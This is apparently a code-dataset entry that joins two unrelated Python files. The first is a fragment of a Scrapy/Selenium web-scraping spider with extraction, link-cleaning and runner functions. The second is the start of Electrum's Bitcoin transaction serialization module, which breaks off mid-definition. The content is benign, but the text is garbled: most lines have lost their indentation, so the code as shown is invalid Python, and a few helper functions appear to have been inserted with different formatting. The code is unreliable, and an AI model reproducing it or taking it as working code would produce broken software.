log_scrap.info(" -+- extract Selenium / dm_name : %s - item_field_xpath : %s " %(dm_name, item_field_xpath ))
# element_present = EC.presence_of_element_located((By.XPATH, item_field_xpath ))
# log_scrap.info(" -+- extract / item_field_xpath present : %s ", element_present )
# try :
# WebDriverWait(self.driver, self.delay_item).until(element_present)
full_data_list = raw_data.find_elements_by_xpath( item_field_xpath )
if dm_type == "url" :
full_data = [ data.get_attribute('href') for data in full_data_list ]
elif dm_type == "image" :
full_data = [ data.get_attribute('src') for data in full_data_list ]
elif dm_type == "date" :
full_data = [ data.get_attribute('datetime') for data in full_data_list ]
elif dm_type == "email" :
full_data = [ data.get_attribute('mailto') for data in full_data_list ]
elif dm_type == "integer" :
full_data = [ int(data.text) for data in full_data_list ]
elif dm_type == "float" :
full_data = [ float(data.text) for data in full_data_list ]
else :
full_data = [ data.text for data in full_data_list ]
# log_scrap.info(" -+- extract / full_data : %s ", full_data )
# except TimeoutException:
# log_scrap.error("-+- extract FAILED / Timed out waiting for page to load")
except :
log_scrap.error(" -+- !!! extract FAILED / with Selenium ... " )
# log_scrap.warning(
# " \n field_name : {} \n item_field_xpath : {} \n dm_field : {} \n full_data : ... ".format(
# self.dm_custom[dm_field]["field_name"],
# item_field_xpath,
# dm_field,
# # full_data
# )
# )
# check if data exists at all
if full_data != None and full_data != [] and full_data != [u""] :
# log_scrap.debug(u" -+- extract / full_data ..." )
### clean data from break lines etc...
full_data = self.clean_data_list(full_data)
# log_scrap.info(" -+- extract / full_data : %s ", full_data )
### in case data needs cleaning before storing
if self.dm_custom[dm_field]["field_type"] in ["url", "image"] :
clean_href_list = []
for data in full_data :
if data != None or data != u"" :
data = self.clean_link(data)
clean_href_list.append(data)
full_data = clean_href_list
# delete duplicates and aggregate
if full_data != None or full_data != [] or full_data != [u""] :
# delete duplicates
full_data_uniques = set(full_data)
full_data_clean = list(full_data_uniques)
# aggregate to existing results
if dm_field in item :
item[ dm_field ] = item[ dm_field ] + full_data_clean
else :
item[ dm_field ] = full_data_clean
log_scrap.warning(u">>> item n°{} - page n°{} >>> END OF : fill_item_from_results_page >>>".format( item_n, self.page_count))
# log_scrap.warning(u"\n %s \n", pformat(item))
return item
### go to follow link and retrieve remaining data for Item
def parse_detailed_page (self, response) :
""" parse_detailed_page """
log_scrap.info(" === GenericSpider / spider_name : '%s' - parse_detailed_page I : %s" %(self.spider_name, response._url) )
item = response.meta["item"]
item_n = response.meta["item_n"]
start_url = response.meta["start_url"]
parse_api = response.meta["parse_api"]
# log_scrap.info(" === GenericSpider / parse_detailed_page I / item_n : {} - page_n : {} ".format(item_n, page_n) )
# if self.there_is_more_items_to_scrap_dict[start_url] :
# if self.there_is_more_items_to_scrap :
log_scrap.info(" === GenericSpider / parse_detailed_page II / item_n : {} - start_url : {} ".format(item_n, start_url) )
# log_scrap.debug(u" === GenericSpider / parse_detailed_page II / spider_name : '%s' - start_url : %s - item n°%s " %(self.spider_name, start_url, self.item_count) )
# log_scrap.debug(u" === GenericSpider / VARIABLES - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
# log_scrap.debug(u" === GenericSpider / VARIABLES - spider_name : {} - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(self.spider_name, self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
item = self.fill_item_from_results_page(response, item, item_n=item_n, is_api_rest=parse_api)
yield item
### follow up and callbacks
def get_next_page(self, response, start_url):
"""
tries to find a new page to scrap.
if it finds one, returns it along with a True value
"""
# start_url = response.meta["start_url"]
log_scrap.info(" === GenericSpider / get_next_page / spider_name : '%s' " %(self.spider_name) )
log_scrap.debug(u"=== GenericSpider / VARIABLES - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
try :
next_page = response.xpath(self.next_page).extract_first()
except :
next_page = None
log_scrap.info(" === GenericSpider.get_next_page / next_page I : %s ", next_page )
if (next_page is not None) and (self.page_count < self.settings_limit_pages ) :
log_scrap.info(" === GenericSpider.get_next_page / self.spider_config_flat['next_page'] : %s ", self.spider_config_flat[ "next_page" ] )
# self.page_count += 1
# next_page = next_page.strip()
# next_page = self.add_string_to_complete_url_if_needed(next_page, self.page_url)
try :
next_page = response.xpath(self.spider_config_flat[ "next_page" ]).extract_first()
log_scrap.info(" === GenericSpider.get_next_page / next_page II : %s ", next_page )
return True, next_page
except:
return False, next_page
else:
return False, next_page
### clean a link if http is missing
def clean_link(self, link=None, url_root=""):
""" complete a link if needed """
if link == None :
link = ""
### erase all spaces in original link
link = ' '.join(link.split())
link = link.replace(" ","").replace('\n', '').replace('\r', '')
### get url_root if needed
if url_root == "" :
url_root_ = self.page_url
else :
url_root_ = url_root
### checks if link is an email
if "@" in link :
if link.startswith("mailto") or link.startswith("http") or link.startswith("/") :
pass
else :
link = "mailto:" + link
elif not link.startswith("http"):
separator = ""
if not link.startswith("/") and url_root == "" :
separator = "/"
link = "{}{}{}".format( url_root_, separator, link)
### DEBUG --> for instance Prix de l'Innovation Urbaine / escape and unicode follow_link
### escape URL encoding
# link = unquote(link)
# log_scrap.debug(u" === clean_link / link (%s): %s", (type(link), link) )
return unicode(link)
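# Illustrative expectations for clean_link(), derived from the logic above (not executed):
#   clean_link("contact@example.org")                          -> "mailto:contact@example.org"
#   clean_link("/articles/42", url_root="http://example.org")  -> "http://example.org/articles/42"
#   clean_link("http://example.org/a b")                       -> "http://example.org/ab"   (all spaces removed)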
### clean data from trailing spaces, multiple spaces, line breaks, etc...
def clean_data_list(self, data_list, chars_to_strip = STRIP_STRING ):
""" clean data list from trailing """
clean_data_list = []
for data in data_list :
# collapse multiple spaces and line breaks
data = ' '.join(data.split())
# skip placeholder values listed in DATA_CONTENT_TO_IGNORE
if data in DATA_CONTENT_TO_IGNORE :
pass
else :
data = data.strip(chars_to_strip)
clean_data_list.append(data)
return clean_data_list
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### SPIDER RUNNER ###########################################################################
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### define the spider runner
### cf : https://stackoverflow.com/questions/13437402/how-to-run-scrapy-from-within-a-python-script
### cf : https://doc.scrapy.org/en/latest/topics/practices.html
### solution chosen from : https://stackoverflow.com/questions/41495052/scrapy-reactor-not-restartable
def run_generic_spider( user_id = None,
spider_id = None,
datamodel = None,
run_spider_config = None,
test_limit = None
):
"""
just launch run_generic_spider() from any handler in controller
"""
print ()
log_scrap.info("--- run_generic_spider / spider_id : %s ", spider_id )
### WARNING !!! --> TEMPORARY SOLUTION
### remove spider folder for spider_id in JOBDIR
log_scrap.debug(u"--- run_generic_spider / cwd : %s", os.getcwd() )
try :
shutil.rmtree( os.getcwd() + "/" + JOBDIR_FOLDER + "/" + spider_id )
except:
pass
log_scrap.debug(u"--- run_generic_spider / removed folder : {}/{}".format(JOBDIR_FOLDER, spider_id) )
# !!! spider is launched from main.py level !!!
# all relative routes referring to this...
log_scrap.info("--- run_generic_spider / os.getcwd() : %s ", os.getcwd() )
### flattening run_spider_config : from nested to flat dict
log_scrap.info("--- run_generic_spider / 'flattenSpiderConfig()' on 'run_spider_config' --> 'spider_config_flat' ..." )
spider_config_flat = flattenSpiderConfig( run_spider_config )
### settings for crawler
# cf : https://hackernoon.com/how-to-crawl-the-web-politely-with-scrapy-15fbe489573d
### global settings for scrapy processes (see upper)
log_scrap.info("--- run_generic_spider / BOT_NAME : %s ", settings.get('BOT_NAME') )
log_scrap.info("--- run_generic_spider / USER_AGENT : %s ", settings.get('USER_AGENT') )
log_scrap.info("--- run_generic_spider / ITEM_PIPELINES : %s ", settings.get('ITEM_PIPELINES').__dict__ )
# specific settings for this scrapy process
# settings.set( "RETRY_TIMES" , RETRY_TIMES )
# settings.set( "CONCURRENT_ITEMS" , CONCURRENT_ITEMS )
# settings.set( "CONCURRENT_REQUESTS" , CONCURRENT_REQUESTS )
# settings.set( "CONCURRENT_REQUESTS_PER_DOMAIN" , CONCURRENT_REQUESTS_PER_DOMAIN )
# settings.set( "REDIRECT_MAX_TIMES" , REDIRECT_MAX_TIMES )
# settings.set( "DOWNLOAD_MAXSIZE" , DOWNLOAD_MAXSIZE )
# settings.set( "DEPTH_PRIORITY" , DEPTH_PRIORITY )
# settings.set( "SCHEDULER_DISK_QUEUE" , SCHEDULER_DISK_QUEUE )
# settings.set( "DEPTH_PRIORITY" , SCHEDULER_MEMORY_QUEUE )
# settings.set( "RANDOMIZE_DOWNLOAD_DELAY" , RANDOMIZE_DOWNLOAD_DELAY )
# cf : https://doc.scrapy.org/en/latest/topics/jobs.html#job-directory
settings.set( "JOBDIR" , JOBDIR_FOLDER + "/" + spider_id )
## https://scrapy.readthedocs.io/en/0.12/topics/extensions.html#module-scrapy.contrib.closespider
settings.set( "CURRENT_SPIDER_ID" , spider_id )
settings.set( "RETRY_TIMES" , spider_config_flat["RETRY_TIMES"] )
settings.set( "CLOSESPIDER_ITEMCOUNT" , spider_config_flat["LIMIT_ITEMS"] )
# settings.set( "CLOSESPIDER_PAGECOUNT" , spider_config_flat["LIMIT_PAGES"] )
settings.set( "DOWNLOAD_DELAY" , spider_config_flat["download_delay"] )
settings.set( "CONCURRENT_ITEMS" , spider_config_flat["CONCURRENT_ITEMS"] )
settings.set( "CONCURRENT_REQUESTS" , spider_config_flat["CONCURRENT_REQUESTS"] )
# settings.set( "DOWNLOAD_DELAY" , DOWNLOAD_DELAY )
settings.set( "BOT_NAME" , spider_config_flat["BOT_NAME"] )
settings.set( "USER_AGENT" , spider_config_flat["USER_AGENT"] )
settings.set( "ROBOTSTXT_OBEY" , spider_config_flat["ROBOTSTXT_OBEY"] )
settings.set( "AUTOTHROTTLE_ENABLED" , spider_config_flat["AUTOTHROTTLE_ENABLED"] )
settings.set( "HTTPCACHE_ENABLED" , spider_config_flat["HTTPCACHE_ENABLED"] )
settings.set( "RANDOMIZE_DOWNLOAD_DELAY" , spider_config_flat["RANDOMIZE_DOWNLOAD_DELAY"] )
### initiating crawler process
log_scrap.info("--- run_generic_spider / instanciate process ..." )
process = CrawlerRunner( settings = settings )
### adding CrawlerRunner as deferred
def f(q):
try:
### send/create custom spider from run_spider_config
### cf : https://stackoverflow.com/questions/35662146/dynamic-spider-generation-with-scrapy-subclass-init-error
deferred = process.crawl( GenericSpider,
user_id = user_id,
datamodel = datamodel ,
spider_id = spider_id ,
spider_config_flat = spider_config_flat,
test_limit = test_limit
)
deferred.addBoth(lambda _: reactor.stop())
reactor.run()
q.put(None)
except Exception as e:
q.put(e)
### putting task in queue and start
q = Queue()
p = Process(target=f, args=(q,))
p.start()
result = q.get()
p.join()
if result is not None:
raise result
print ("\n\n{}\n".format("> > > "*20))
#############################################
### cool snippets
### convert to class object
# spider = globals()[spider]
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != 0
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(b'\x01' if val else b'\x00')
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
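# A small illustrative round-trip for BCDataStream (not part of the original module;
# a minimal sketch showing the compact-size and length-prefixed string encoding above).
def _bcdatastream_roundtrip_example():
    out = BCDataStream()
    out.write_compact_size(253)   # encoded as b'\xfd\xfd\x00' (marker byte + 2-byte length)
    out.write_string('hello')     # 1-byte length prefix + ASCII bytes
    inp = BCDataStream()
    inp.write(bytes(out.input))
    assert inp.read_compact_size() == 253
    assert inp.read_string() == 'hello'
    return bytes(out.input)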
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(_bytes):
    return _bytes.hex()
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(_bytes):
    t = _bytes.hex()
    if len(t) < 11:
        return t
    return t[0:4]+"..."+t[-4:]
def script_GetOp(_bytes):
i = 0
blen = len(_bytes)
while i < blen:
vch = None
opcode = _bytes[i]
i += 1
if opcode <= opcodes.OP_PUSHDATA4:
nSize = opcode
if opcode == opcodes.OP_PUSHDATA1:
nSize = _bytes[i] if i < blen else 0
i += 1
elif opcode == opcodes.OP_PUSHDATA2:
(nSize,) = struct.unpack_from('<H', _bytes, i) if i+2 <= blen else (0,) # tolerate truncated script
i += 2
elif opcode == opcodes.OP_PUSHDATA4:
(nSize,) = struct.unpack_from('<I', _bytes, i) if i+4 <= blen else (0,)
i += 4
vch = _bytes[i:i + nSize] # array slicing here never throws exception even if truncated script
i += nSize
yield opcode, vch, i
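# Illustrative only: walking a standard P2PKH scriptPubKey
# (OP_DUP OP_HASH160 <20 bytes> OP_EQUALVERIFY OP_CHECKSIG) with script_GetOp();
# the single push yields the 20-byte hash160 payload.
def _script_getop_example():
    script = bytes.fromhex('76a914' + '00' * 20 + '88ac')
    ops = list(script_GetOp(script))
    opcodes_seen = [op for op, vch, pos in ops]
    assert opcodes_seen == [0x76, 0xa9, 0x14, 0x88, 0xac]
    assert ops[2][1] == b'\x00' * 20   # the pushed hash160 payload
    return ops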
def script_GetOpName(opcode):
return (opcodes.whatis(opcode)).replace("OP_", "")
def decode_script(bytes):
result = ''
for (opcode, vch, i) in script_GetOp(bytes):
if len(result) > 0: result += " "
if opcode <= opcodes.OP_PUSHDATA4:
result += "%d:"%(opcode,)
result += short_hex(vch)
else:
result += script_GetOpName(opcode)
return result
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = list(script_GetOp(_bytes))
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
# added to suppress print_error statements during lib/test_slp_consensus.py (uses 'fake' transactions that have empty scriptSig)
if len(decoded) == 0:
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = [ x for x in script_GetOp(s) ]
# the following throws an exception when the redeem script has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput(bytes(_bytes))
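# For reference, the byte-level templates matched above are the standard ones:
#   P2SH  (23 bytes): OP_HASH160 <push 20> <hash160> OP_EQUAL
#   P2PKH (25 bytes): OP_DUP OP_HASH160 <push 20> <hash160> OP_EQUALVERIFY OP_CHECKSIG
#   P2PK  (35 / 67 bytes): <push 33|65> <pubkey> OP_CHECKSIG
# Anything else falls through to a generic ScriptOutput.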
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
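# A minimal sketch (illustrative only): deserialize() applied to a hand-built
# 1-input / 1-output raw tx with a coinbase-style input (prevout hash of all zeros)
# and an empty output script; it returns a dict with 'version', 'inputs', 'outputs'
# and 'lockTime' keys.
def _deserialize_example():
    raw = (
        '01000000'             # version
        '01'                   # number of inputs
        + '00' * 32 +          # prevout hash (all zeros -> treated as coinbase)
        'ffffffff'             # prevout index
        '00'                   # scriptSig length (empty)
        'ffffffff'             # sequence
        '01'                   # number of outputs
        '0000000000000000'     # value (0 satoshis)
        '00'                   # scriptPubKey length (empty)
        '00000000'             # locktime
    )
    d = deserialize(raw)
    assert d['version'] == 1 and d['lockTime'] == 0
    assert d['inputs'][0]['type'] == 'coinbase'
    return d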
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
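# Illustrative only: a 2-of-3 multisig redeem script built from three made-up 33-byte
# compressed pubkeys. '52' is OP_2, '53' is OP_3 and 'ae' is OP_CHECKMULTISIG; each key
# is preceded by its push opcode as emitted by op_push() (imported above).
def _multisig_script_example():
    fake_pubkeys = ['02' + '11' * 32, '02' + '22' * 32, '03' + '33' * 32]
    script_hex = multisig_script(fake_pubkeys, 2)
    assert script_hex.startswith('52') and script_hex.endswith('53ae')
    return script_hex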
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures from the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
